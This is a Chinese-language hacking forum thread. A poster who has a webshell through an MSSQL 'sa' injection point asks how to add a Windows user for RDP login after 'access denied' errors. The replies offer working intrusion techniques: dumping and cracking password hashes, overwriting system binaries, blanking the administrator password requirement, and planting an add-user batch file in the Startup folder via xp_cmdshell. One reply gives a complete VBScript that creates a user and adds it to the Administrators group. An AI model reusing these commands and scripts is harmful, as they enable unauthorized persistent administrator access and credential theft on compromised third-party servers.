遇到一个SA注入点,拿到了webshell
注入点可以直接执行命令
开了3389,能连接上
问题是始终加不上用户!
net user命令可以执行
net user test test /add
提示“拒绝访问”!
net user user pass
想更改用户密码或者添加用户的时候
就会提示“拒绝访问”
上传过本地的cmd.exe、net.exe、net1.exe
还试过mt.exe克隆和pspasswd.exe更改密码都无效!
因为执行上述文件都一律提示“拒绝访问”!
开始以为是那个目录没有执行权限
传到everyone完全控制的目录同样提示“拒绝访问”!
cacls.exe更改net.exe和net1.exe等文件的访问权限同样提示“拒绝访问”!
和朋友讨论过了,也是加不上用户!
始终不能登录3389,放马运行也同样提示“拒绝访问”!
###################################################
可以用Gethashes.exe导出HASH,跑一下管理密码,然后登录.
###################################################
不会装的MCAFEE,拒绝远程运行EXE文件?
改成COM试试?
###################################################
who am i看一下。
有可能拒绝了system用户的访问,你可以删掉cmd.exe,net.exe../它自己会恢复的,而且权限也恢复默认了
###################################################
既然net user /add还有更改密码都没有权限,试试
net user administrator /passwordreq:no
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登 陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了....可以试试...
###################################################
把exe文件传上去 把名字改成一个你可以用的系统内置的exe程序 然后用你的exe覆盖原来的 执行程序看一下下
###################################################
利用xp_cmdshell扩展执行echo net user hackest hackest123 /add > C:\Documents and Settings\All Users\「开始」菜单\程序\启动\add.bat
###################################################
现在弄明白的了,嘿嘿
换句话说就是:
SA在MSSQL里是最高权限的
它可以调用xp_cmdshell等存储过程
如果MSSQL以系统权限启动
那SA就几乎等于系统权限
如果MSSQL以users权限启动
那SA的最高境界也不过是users组用户而已
与系统下的普通用户组的用户权限一样
是无法添加系统用户的!
###################################################
用 user.vbs 看看把
struser=wscript.arguments(0)
strpass=wscript.arguments(1)
set lp=createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
oe.Add(of.ADsPath)
For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & " 建立成功!"
wscript.quit
end if
Next
Wscript.echo struser & " 用户建立失败!"
cscript user.vbs yexu yexu
###################################################
sa沙盒还是不错得选择 可能是.dll文件改名了 我也遇到过这样得情况 沙盒直接解决(开3389得情况)
其实还可以用用nbsi得其他执行命令的执行下
###################################################